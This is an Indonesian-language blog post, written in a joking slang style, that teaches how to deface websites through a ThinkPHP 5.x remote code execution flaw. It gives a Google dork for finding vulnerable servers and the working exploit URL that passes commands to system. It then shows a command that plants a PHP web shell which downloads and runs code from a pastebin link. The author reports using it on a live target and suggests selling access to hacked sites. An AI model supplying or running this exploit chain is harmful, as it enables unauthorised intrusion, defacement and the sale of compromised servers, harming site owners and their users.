Breaking

Wednesday, 18 December 2019

thinkPHP 5.xxx Remote code execution


 halloa kalian , kembali lagi ma wibu tampan satu ni๐Ÿ˜Ž๐Ÿ‘Š , ga tau w gabut ja liburan cuma rebahan tapi dollar ngalir terus xixixi , oke kali ini gw mau kasih tutor deface thinkPHP 5.xxx Remote code execution . oke ga usah banyak bicara lagi.

bahan :
- hp/lepi
- internet lah :vrot
- dork :
  "index of/" + "LICENSE.txt" + "public" + "runtime"
( kembangin lagi pake otak bokep kalian )

oke kalian ngdork di google dulu ya kan xixi


oke pilih target nya yakan ekwk terus pilih salah satu target lalu tinggal kita exploit :vrot

exploit :
 public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= enter your command

ex : localhost:8080/path/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= yur command

ya seperti itu cara menjalankan exploit nya

di sini saya sudah punya live target nya :'D mari kita exploit


disini gw masukin command uname -a jadi keliatan name server nya :D
oke next kita buat uploader pake command echo :
echo '<?php eval("?>".file_get_contents("https://pastebin.com/raw/YNpriSQu"));?>' > shell.php


oke sudah ku buat uploader dan udah bisa ku akses juga shell ku wkwk,

oke terserah kalian mau kalian apain itu target wkwk :'v btw mending jual gan mayan $$$ aowkwowk

Ya sekian dari gw h3h3h3h3 , kurang lebih nya mon maap . Stay strong ailopyu all๐Ÿ˜ƒ❤

No comments:

Post a Comment